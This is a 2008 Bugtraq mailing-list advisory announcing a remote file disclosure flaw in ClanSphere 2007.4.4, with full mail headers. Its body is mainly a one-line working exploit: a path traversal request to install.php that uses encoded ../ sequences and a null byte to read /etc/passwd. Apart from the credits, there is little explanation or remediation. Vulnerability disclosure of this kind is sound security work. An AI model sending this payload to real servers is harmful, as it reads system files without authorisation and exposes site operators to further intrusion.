ClanSphere 2007.4.4 Remote File Disclosure Vulnerability.
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: ClanSphere 2007.4.4 Remote File Disclosure Vulnerability.
- From: p4imi0 <p4imi0@xxxxxxxxx>
- Date: Mon, 28 Jan 2008 00:36:59 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=AK5wdiguTmmWV6d7/6W8ZZOIKBEKsGuRmVHEJXKypUk=; b=jgsuzqn80evwa0c2uIx+gIPl+IwxwqfPu2dzxMKQjJqGwuCdbF2j7/NjmdPRj6f7uP22gQj3RFsccagwRX5pXDkulke2qJMHUuuk1xrtpbZ812Utuo5v103SPeHxSfzHprRvfLInvvv5G/vDYH30VNo66iI4QMTYFDYVeR+Huzo=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=G4k0Y04I9eQOQBZ27Ko533pGtOSTViYZ8Jh083DTf9qkIwVGrILUFmzRwwXSqktb6YLr0FAyWdN3KbfwJVmZG+5VpOwUMoDEuCoXH/+HqCjuSj5YNDWvq9NqQVOEjtP7EvlhkZ0k7f4QMgfie4AOpsSe2CPsNHEUVzfnUchp0No=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
--------------------------------------------------------------
ClanSphere 2007.4.4 Remote File Disclosure Vulnerability.
--------------------------------------------------------------
download : http://sourceforge.net/projects/clansphere/
author : p4imi0
contact : p4imi0@xxxxxxxxx
exploit :
install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
thanks to : str0ke, Cr[]w.